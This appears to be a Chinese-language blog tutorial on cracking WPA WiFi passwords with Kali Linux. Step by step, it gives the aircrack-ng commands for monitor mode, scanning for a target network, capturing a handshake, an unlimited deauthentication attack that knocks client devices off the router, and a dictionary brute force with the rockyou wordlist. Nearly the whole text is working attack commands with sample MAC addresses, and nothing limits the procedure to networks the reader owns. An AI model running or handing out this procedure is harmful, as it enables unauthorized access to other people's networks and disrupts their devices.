0x01 准備工作
利用kali破解wifi密碼,需要在虛擬機里安裝kali系統,並購買一個支持監聽的外置USB網卡!
0x02 開始
插入usb網卡並查看
打開kali虛擬機,插入usb無線網卡,選擇連接kali虛擬機
打開終端輸入:
iwconfig
查看無線網卡
airmon-ng
該命令列出了支持監控模式的無線網卡,如果沒有任何輸出,則表示無線網卡不支持監控模式。
記下Interface名稱,開啟網卡的監聽模式
airmon-ng start wlan0
如果出現結果如下圖,說明還有其他網卡處於監聽狀態,需要先將其關閉
airmon-ng check kill
再次開啟監聽模式,並記下其Interface
airmon-ng start wlan0
掃描信號
掃描附近的wifi信號
airodump-ng wlan0mon
找到自己的目標wifi后使用 Ctrl+c 中止
- BSSID AP端的mac地址
- PWR 信號強度(絕對值越小,信號越強)
- Data 對應路由器的在線數據吞吐量,數值越大,數值上傳量越大
- CH 對應路由的頻道
- ESSID 對應路由器的名稱
抓取握手包
輸入命令:
airodump-ng -c 6 -w ./test --bssid 24:16:6D:21:D1:E0 wlan0mon airodump-ng -c <AP信道> -w <抓取握手包后存放位置名稱> --bssid <AP的mac地址> <interface名稱>
這里需要有設備與路由傳輸數據才可以。
解除認證攻擊
保持命令窗口處於運行狀態,再打開一個新的命令窗口,進行解除認證攻擊,即強制連接到目的wifi路由的設備重新連接。
aireplay-ng -0 0 -a 88:C3:97:31:E8:9D -c C0:EE:FB:4F:A2:7F wlan0mon aireplay-ng -<攻擊模式,這里使用持續攻擊(0)> [攻擊次數,0為無限攻擊] -a <AP端的MAC地址> -c <被攻擊設備的MAC地址> <interface名稱>
當下圖所示位置顯示 WPA hankshake 即成功抓到握手包,將兩個命令框都輸入 Ctrl + C 終止攻擊和握手抓包。
關閉無線網卡監聽模式
airmon-ng stop wlan0mon
0x03 使用字典暴力破解
kali自帶有一份無線wifi密碼字典,但是需要先解壓
gzip -d /usr/share/wordlists/rockyou.txt.gz
爆破
aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 88:C3:97:31:E8:9D test-01.cap aircrack-ng -w <指定字典> -b <目的路由MAC地址> <抓到的握手包>
爆破成功后,如圖區域會顯示 KEY FOUND![ 密碼 ]
大功告成!!!